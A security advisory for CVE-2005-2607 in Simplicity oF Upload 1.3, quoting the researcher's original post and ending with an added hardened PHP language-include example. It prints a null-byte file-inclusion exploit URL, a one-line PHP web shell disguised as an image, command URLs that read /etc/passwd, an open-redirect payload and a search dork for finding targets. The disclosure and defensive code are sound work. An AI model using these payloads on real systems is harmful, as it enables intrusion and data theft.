Simplicity oF Upload Lets Remote Users Upload and Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1014591
|
|
SecurityTracker URL: http://securitytracker.com/id?1014591
|
|
CVE Reference: CVE-2005-2607
|
Updated: Jul 6 2008
|
Original Entry Date: Jul 28 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.3
|
Description: rgod reported a vulnerability in Simplicity oF Upload. A remote user can upload and then execute arbitrary code on the target system.
The script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply a specially crafted parameter value ending in a null byte (%00) to include arbitrary local files.
A remote user can submit the following URL to cause both the download and upload pages to load at the same time:
http://[target]/simply/download.php?language=upload.php%00
This allows the remote user to upload a file that contains arbitrary PHP code but has a filename that appears to be an image file (e.g., 'cmd.gif'). A demonstration exploit file is provided:
<?php
system($HTTP_GET_VARS[command]);
?>
Then, the remote user can invoke the uploaded file to execute arbitrary commands on the target system with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
A remote user can also supply a specially crafted URL that, when loaded by the target user, will redirect the target user to another web page:
http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00
|
Impact: A remote user can upload arbitrary code to the target system and then have the web server execute the code.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpsimplicity.com/scripts.php?id=3
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "retrogod@aliceposta.it" <retrogod@aliceposta.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Jul 2005 16:24:19 +0200 (ora legale Europa occidentale)
From: "retrogod@aliceposta.it" <retrogod@aliceposta.it>
Subject: Simplicity OF Upload 1.3 (possibly prior versions) remote code execution & cross site scripting
|
Simplicity OF Upload 1.3 (possibly prior versions) remote code execution & cross site scripting
software:
author site: http://www.phpsimplicity.com/scripts.php?id=3
remote commands execution:
problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
$language = strtolower($_GET['language']);
//now we include the language file
require_once("$language.lng");
...
you can include whatever adding a null byte to "language" parameter value:
example:
http://localhost:30/simply/download.php?language=upload.php%00
you will see upload & download page together :)
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...) file with this php code inside to execute
commands:
<?php
system($HTTP_GET_VARS[command]);
?>
then try this url:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
to list directories
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
to show /etc/passwd file
cross site scripting:
also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
googledork:
"Powered By: Simplicity oF Upload"
rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
|
|
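A hardened form of the language-file include quoted in the source message above, as an added example that is not code from Simplicity oF Upload or from the advisory. The names LANG_DIR, DEFAULT_LANGUAGE and resolve_language_file(), and the directory layout, are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example, not Simplicity oF Upload code. LANG_DIR, DEFAULT_LANGUAGE and
// resolve_language_file() are hypothetical names chosen for illustration.

const LANG_DIR = __DIR__ . '/lang';   // assumed directory holding the *.lng files
const DEFAULT_LANGUAGE = 'english';   // assumed fallback language

/** Map a request value to an existing .lng file; never build a path from input. */
function resolve_language_file($requested, string $langDir = LANG_DIR): string
{
    // Allowlist: language names are taken from the files present on disk.
    $allowed = [];
    foreach (glob($langDir . '/*.lng') ?: [] as $file) {
        $allowed[basename($file, '.lng')] = $file;
    }

    // Non-string input such as ?language[]=x falls back to the default.
    $name = is_string($requested) ? strtolower($requested) : DEFAULT_LANGUAGE;

    // Strict grammar rejects NUL bytes, dots, slashes and URL schemes.
    if (!preg_match('/\A[a-z]{2,20}\z/', $name) || !isset($allowed[$name])) {
        $name = DEFAULT_LANGUAGE;
    }
    if (!isset($allowed[$name])) {
        throw new RuntimeException('default language file is missing');
    }

    // Defence in depth: the resolved path must stay inside the language directory.
    $real = realpath($allowed[$name]);
    $base = realpath($langDir);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file is outside the language directory');
    }
    return $real;
}

// In the web script: require_once resolve_language_file($_GET['language'] ?? null);

// CLI demo on constructed input: the values from the advisory plus one valid name.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/lng_demo_' . getmypid();
    is_dir($dir) || mkdir($dir);
    touch("$dir/english.lng");
    touch("$dir/french.lng");
    foreach (['French', "upload.php\0", "cmd.gif\0", 'http://example.invalid/x', ['x']] as $in) {
        echo json_encode($in), ' => ', basename(resolve_language_file($in, $dir)), PHP_EOL;
    }
}
```

PHP 5.3.4 and later reject a NUL byte in an include path, and remote URLs are included only when allow_url_include is enabled; the allowlist is what keeps the parameter from selecting a file at all.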